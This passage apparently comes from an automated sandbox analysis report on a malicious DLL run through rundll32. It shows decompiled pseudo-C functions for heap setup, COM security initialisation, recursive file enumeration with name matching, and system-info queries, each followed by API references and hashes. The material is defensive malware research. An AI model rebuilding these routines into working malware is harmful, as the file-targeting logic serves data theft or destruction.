                                                                                                                                                                                                                                                                            0x100091f4
                                                                                                                                                                                                                                                                            0x100091f4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000008,?,?,10009D20,?,00000144,?,1001D870), ref: 100091FB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: a1724c618028bfcded9b80a66d06ee146d712e201a6a31212b0cff90572a81ef
                                                                                                                                                                                                                                                                            • Instruction ID: 342390e67e4f0fe4b4c842e576955cec4b9b0ba4bfb70e4c5827aed0232cbac9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1724c618028bfcded9b80a66d06ee146d712e201a6a31212b0cff90572a81ef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2C08C3128030DEBFB004BE8ACC8EE137EDAB48B86F008021F60C86010DB72F4905690
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E100091D2() {
                                                                                                                                                                                                                                                                            				void* _t1;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                                                                                                                            				 *0x100210a8 = _t1;
                                                                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x100091db
                                                                                                                                                                                                                                                                            0x100091e1
                                                                                                                                                                                                                                                                            0x100091e6

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00096000,00000000,10001030), ref: 100091DB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                                                                                                                                            • Opcode ID: 37b401eb958f48d282de142a9ffb26c8eb2c0351bd70c74a715d756c8d18baf3
                                                                                                                                                                                                                                                                            • Instruction ID: c582112d83fcd323f90af3847f647c21d19e36f3ca6bffefd4a97ee30eb31e67
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37b401eb958f48d282de142a9ffb26c8eb2c0351bd70c74a715d756c8d18baf3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3B01274680310AAF7100B604CC6B0135905744B03F300111F305581D0C6F120809508
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E1000B56F(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                                                            				signed int* _t36;
                                                                                                                                                                                                                                                                            				signed int* _t39;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_t36 = _a8;
                                                                                                                                                                                                                                                                            				_t28 = _t36[1];
                                                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                                                            					_t39 = _t36[2];
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                                                                                                            						if(_t39[2] > 0) {
                                                                                                                                                                                                                                                                            							_t31 = _t39[3];
                                                                                                                                                                                                                                                                            							_t22 = _a4 + 0x24;
                                                                                                                                                                                                                                                                            							_v12 = _a4 + 0x24;
                                                                                                                                                                                                                                                                            							_v8 = _t39[3];
                                                                                                                                                                                                                                                                            							while(E1000C3F3(_t22,  *_t31) != 0) {
                                                                                                                                                                                                                                                                            								_t26 = _a8 + 1;
                                                                                                                                                                                                                                                                            								_t31 = _v8 + 4;
                                                                                                                                                                                                                                                                            								_a8 = _t26;
                                                                                                                                                                                                                                                                            								_t22 = _v12;
                                                                                                                                                                                                                                                                            								_v8 = _v8 + 4;
                                                                                                                                                                                                                                                                            								if(_t26 < _t39[2]) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						_t39 =  &(_t39[4]);
                                                                                                                                                                                                                                                                            						_t28 = _t28 - 1;
                                                                                                                                                                                                                                                                            					} while (_t28 != 0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				Sleep(0xa);
                                                                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x1000b572
                                                                                                                                                                                                                                                                            0x1000b573
                                                                                                                                                                                                                                                                            0x1000b576
                                                                                                                                                                                                                                                                            0x1000b579
                                                                                                                                                                                                                                                                            0x1000b57e
                                                                                                                                                                                                                                                                            0x1000b581
                                                                                                                                                                                                                                                                            0x1000b584
                                                                                                                                                                                                                                                                            0x1000b584
                                                                                                                                                                                                                                                                            0x1000b58c
                                                                                                                                                                                                                                                                            0x1000b591
                                                                                                                                                                                                                                                                            0x1000b594
                                                                                                                                                                                                                                                                            0x1000b597
                                                                                                                                                                                                                                                                            0x1000b59a
                                                                                                                                                                                                                                                                            0x1000b59d
                                                                                                                                                                                                                                                                            0x1000b5b0
                                                                                                                                                                                                                                                                            0x1000b5b1
                                                                                                                                                                                                                                                                            0x1000b5b4
                                                                                                                                                                                                                                                                            0x1000b5ba
                                                                                                                                                                                                                                                                            0x1000b5bd
                                                                                                                                                                                                                                                                            0x1000b5c0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000b5c2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000b5c0
                                                                                                                                                                                                                                                                            0x1000b5c6
                                                                                                                                                                                                                                                                            0x1000b5c6
                                                                                                                                                                                                                                                                            0x1000b5c8
                                                                                                                                                                                                                                                                            0x1000b5c8
                                                                                                                                                                                                                                                                            0x1000b5cb
                                                                                                                                                                                                                                                                            0x1000b5cb
                                                                                                                                                                                                                                                                            0x1000b5d0
                                                                                                                                                                                                                                                                            0x1000b5d8
                                                                                                                                                                                                                                                                            0x1000b5e4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(0000000A), ref: 1000B5D8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8d7f6698e92f291931e67ca9405abd4c5ee523d558af10fe8d23cec2e9bea250
                                                                                                                                                                                                                                                                            • Instruction ID: 8d11abeebc2aa343c0c0e72f51ee83e32999685b087293867dd598be26712cdf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d7f6698e92f291931e67ca9405abd4c5ee523d558af10fe8d23cec2e9bea250
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59115E31A00B05AFEB00CF99C884B59B7E4EF08361F1084A9E859E7344C670E941CB40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                                                                                            			E1000D2F7(void* __ecx) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                                                            				intOrPtr* _t16;
                                                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                                                                                                                            				intOrPtr* _t24;
                                                                                                                                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                                                                                                            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                                                                                                            				_t15 =  &_v12;
                                                                                                                                                                                                                                                                            				__imp__CoCreateInstance(0x1001d848, 0, 1, 0x1001d858, _t15);
                                                                                                                                                                                                                                                                            				if(_t15 < 0) {
                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                            					_t23 = _v8;
                                                                                                                                                                                                                                                                            					if(_t23 != 0) {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t24 = _v12;
                                                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t16 = 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					__imp__#2(__ecx);
                                                                                                                                                                                                                                                                            					_t25 = _v12;
                                                                                                                                                                                                                                                                            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                                                                                                            					if(_t21 < 0) {
                                                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                                                                                                            						if(_t21 < 0) {
                                                                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t16 = E100091E7(8);
                                                                                                                                                                                                                                                                            							if(_t16 == 0) {
                                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                                                                                                            								 *_t16 = _v8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x1000d304
                                                                                                                                                                                                                                                                            0x1000d307
                                                                                                                                                                                                                                                                            0x1000d30a
                                                                                                                                                                                                                                                                            0x1000d31b
                                                                                                                                                                                                                                                                            0x1000d321
                                                                                                                                                                                                                                                                            0x1000d332
                                                                                                                                                                                                                                                                            0x1000d33a
                                                                                                                                                                                                                                                                            0x1000d38b
                                                                                                                                                                                                                                                                            0x1000d38b
                                                                                                                                                                                                                                                                            0x1000d390
                                                                                                                                                                                                                                                                            0x1000d395
                                                                                                                                                                                                                                                                            0x1000d395
                                                                                                                                                                                                                                                                            0x1000d398
                                                                                                                                                                                                                                                                            0x1000d39d
                                                                                                                                                                                                                                                                            0x1000d3a2
                                                                                                                                                                                                                                                                            0x1000d3a2
                                                                                                                                                                                                                                                                            0x1000d3a5
                                                                                                                                                                                                                                                                            0x1000d33c
                                                                                                                                                                                                                                                                            0x1000d33d
                                                                                                                                                                                                                                                                            0x1000d343
                                                                                                                                                                                                                                                                            0x1000d354
                                                                                                                                                                                                                                                                            0x1000d359
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d35b
                                                                                                                                                                                                                                                                            0x1000d368
                                                                                                                                                                                                                                                                            0x1000d370
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d372
                                                                                                                                                                                                                                                                            0x1000d374
                                                                                                                                                                                                                                                                            0x1000d37c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d37e
                                                                                                                                                                                                                                                                            0x1000d381
                                                                                                                                                                                                                                                                            0x1000d387
                                                                                                                                                                                                                                                                            0x1000d387
                                                                                                                                                                                                                                                                            0x1000d37c
                                                                                                                                                                                                                                                                            0x1000d370
                                                                                                                                                                                                                                                                            0x1000d359
                                                                                                                                                                                                                                                                            0x1000d3aa

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D30A
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D31B
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(1001D848,00000000,00000001,1001D858,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D332
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1000D33D
                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D368
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3531828250-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1b73c657c68c961315636518ff4f579f70757a2e44550ced84fe791c63f005e9
                                                                                                                                                                                                                                                                            • Instruction ID: ce2d2dd4c4ff7f207a7cbb150afae4e575ecdd36406f0dbb136e095dd0923906
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b73c657c68c961315636518ff4f579f70757a2e44550ced84fe791c63f005e9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D21D570600255BBEB24AB66CC9DE5FBFBCEFC7B51F11415DB501A6290CB709A40DA31
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                                            			E10009E70(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				WCHAR* _v16;
                                                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                                                                                                                            				WCHAR* _t24;
                                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t75 = __fp0;
                                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                                            				_t48 = __ecx;
                                                                                                                                                                                                                                                                            				_push(L"\\*");
                                                                                                                                                                                                                                                                            				_t24 = E100099EC(__ecx);
                                                                                                                                                                                                                                                                            				_t63 = _t62 + 0xc;
                                                                                                                                                                                                                                                                            				_v16 = _t24;
                                                                                                                                                                                                                                                                            				if(_t24 == 0) {
                                                                                                                                                                                                                                                                            					return _t24;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                                                                                                                                                                                                                            				if(_t59 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                                                            					return E10009203( &_v16, 0xfffffffe);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					if(E10009E48( &(_v608.cFileName)) != 0) {
                                                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                                                            						_push( &(_v608.cFileName));
                                                                                                                                                                                                                                                                            						_push("\\");
                                                                                                                                                                                                                                                                            						_t60 = E100099EC(_t48);
                                                                                                                                                                                                                                                                            						_t63 = _t63 + 0x10;
                                                                                                                                                                                                                                                                            						_v12 = _t60;
                                                                                                                                                                                                                                                                            						if(_t60 != 0) {
                                                                                                                                                                                                                                                                            							_t54 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t54 + 0xc4))(1);
                                                                                                                                                                                                                                                                            							_push(1);
                                                                                                                                                                                                                                                                            							_push(1);
                                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                                            							E10009E70(_t60, _t75, 1, 5, E10010B2A, _a16);
                                                                                                                                                                                                                                                                            							_t63 = _t63 + 0x1c;
                                                                                                                                                                                                                                                                            							E10009203( &_v12, 0xfffffffe);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t61 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t61 + 0x100210d0)));
                                                                                                                                                                                                                                                                            						_push( &(_v608.cFileName));
                                                                                                                                                                                                                                                                            						_t41 =  *0x10020fe0; // 0x466fbe0
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t45 = E10010B2A(_t75, _t48,  &_v608, _a16);
                                                                                                                                                                                                                                                                            						_t63 = _t63 + 0xc;
                                                                                                                                                                                                                                                                            						if(_t45 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t46 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t46 + 0xc4))(1);
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						_t61 = _t61 + 4;
                                                                                                                                                                                                                                                                            					} while (_t61 < 4);
                                                                                                                                                                                                                                                                            					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                                                                                                                                                                                                                            				_t31 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t31 + 0x84))(_t59);
                                                                                                                                                                                                                                                                            				goto L14;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x10009e70
                                                                                                                                                                                                                                                                            0x10009e7c
                                                                                                                                                                                                                                                                            0x10009e7e
                                                                                                                                                                                                                                                                            0x10009e80
                                                                                                                                                                                                                                                                            0x10009e86
                                                                                                                                                                                                                                                                            0x10009e8b
                                                                                                                                                                                                                                                                            0x10009e8e
                                                                                                                                                                                                                                                                            0x10009e93
                                                                                                                                                                                                                                                                            0x10009faf
                                                                                                                                                                                                                                                                            0x10009faf
                                                                                                                                                                                                                                                                            0x10009ea7
                                                                                                                                                                                                                                                                            0x10009eac
                                                                                                                                                                                                                                                                            0x10009f9e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009eb2
                                                                                                                                                                                                                                                                            0x10009eb2
                                                                                                                                                                                                                                                                            0x10009ebf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009ecd
                                                                                                                                                                                                                                                                            0x10009f20
                                                                                                                                                                                                                                                                            0x10009f20
                                                                                                                                                                                                                                                                            0x10009f28
                                                                                                                                                                                                                                                                            0x10009f29
                                                                                                                                                                                                                                                                            0x10009f34
                                                                                                                                                                                                                                                                            0x10009f36
                                                                                                                                                                                                                                                                            0x10009f39
                                                                                                                                                                                                                                                                            0x10009f3e
                                                                                                                                                                                                                                                                            0x10009f40
                                                                                                                                                                                                                                                                            0x10009f48
                                                                                                                                                                                                                                                                            0x10009f4e
                                                                                                                                                                                                                                                                            0x10009f50
                                                                                                                                                                                                                                                                            0x10009f52
                                                                                                                                                                                                                                                                            0x10009f67
                                                                                                                                                                                                                                                                            0x10009f6c
                                                                                                                                                                                                                                                                            0x10009f75
                                                                                                                                                                                                                                                                            0x10009f7b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009f3e
                                                                                                                                                                                                                                                                            0x10009ecf
                                                                                                                                                                                                                                                                            0x10009ed1
                                                                                                                                                                                                                                                                            0x10009ed1
                                                                                                                                                                                                                                                                            0x10009edd
                                                                                                                                                                                                                                                                            0x10009ede
                                                                                                                                                                                                                                                                            0x10009ee8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009ef5
                                                                                                                                                                                                                                                                            0x10009efa
                                                                                                                                                                                                                                                                            0x10009eff
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009f01
                                                                                                                                                                                                                                                                            0x10009f08
                                                                                                                                                                                                                                                                            0x10009f0e
                                                                                                                                                                                                                                                                            0x10009f0e
                                                                                                                                                                                                                                                                            0x10009f11
                                                                                                                                                                                                                                                                            0x10009f1e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10009f7c
                                                                                                                                                                                                                                                                            0x10009f8a
                                                                                                                                                                                                                                                                            0x10009f92
                                                                                                                                                                                                                                                                            0x10009f98
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 10009EA1
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 10009F84
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1690352074-0
                                                                                                                                                                                                                                                                            • Opcode ID: ae9c37ce122c04667dac7d1167ad8c9b28cb489da10c75ada123c9762d696c28
                                                                                                                                                                                                                                                                            • Instruction ID: 555cadeb5f071304b440e3dadb6de0eb34a7c2fec7698278087d2bad13c9927d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae9c37ce122c04667dac7d1167ad8c9b28cb489da10c75ada123c9762d696c28
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51310831A042166FFB10DBA4CD89FAA77A9EB04790F100074F919D71D6EB71ED40CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E1000B967(void* __ecx) {
                                                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                                                            					GetSystemInfo( &_v40);
